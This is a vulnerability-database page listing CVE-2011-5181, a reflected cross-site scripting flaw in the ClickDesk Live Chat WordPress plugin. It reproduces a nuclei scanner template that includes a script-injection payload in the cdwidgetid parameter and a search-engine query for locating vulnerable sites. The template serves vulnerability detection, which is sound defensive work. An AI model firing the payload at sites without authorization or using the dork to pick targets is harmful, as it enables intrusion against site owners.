Lucene search
K

ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

A vulnerability in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5181
23 Nov 201100:00
circl
CVE
CVE-2011-5181
20 Sep 201210:00
cve
Cvelist
CVE-2011-5181
20 Sep 201210:00
cvelist
EUVD
EUVD-2011-5081
7 Oct 202500:30
euvd
NVD
CVE-2011-5181
20 Sep 201210:55
nvd
Patchstack
WordPress ClickDesk Live Support Plugin 2.0 - Cross Site Scripting
23 Nov 201100:00
patchstack
Prion
Cross site scripting
20 Sep 201210:55
prion
id: CVE-2011-5181

info:
  name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the ClickDesk Live Support Live Chat plugin to mitigate the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-5181
    - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-5181
    cwe-id: CWE-79
    epss-score: 0.01282
    epss-percentile: 0.79998
    cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: clickdesk
    product: "clickdesk_live_support-live_chat_plugin"
    google-query: "inurl:\"/wp-content/plugins/clickdesk-live-support-chat/\""
  tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'ClickDesk Live Support - Live Chat'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b30ad6c2d7976ec66e3986d1350f8dc8b2d4a15476ea39d07b3626e07d5f353e02201eb8d4a0e0573e4a15e16d4e11ff557d259b25c25b356ce57756de9692d2cd8b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 24.3
EPSS0.01282
13